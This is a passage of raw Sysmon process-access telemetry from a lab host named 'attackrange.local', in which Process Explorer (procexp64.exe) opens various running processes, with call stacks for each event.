15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786196Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786195Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786194Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786193Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786192Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786191Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786190Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786189Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786188Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786187Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786186Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786185Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786184Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786183Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786182Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786181Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786180Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files 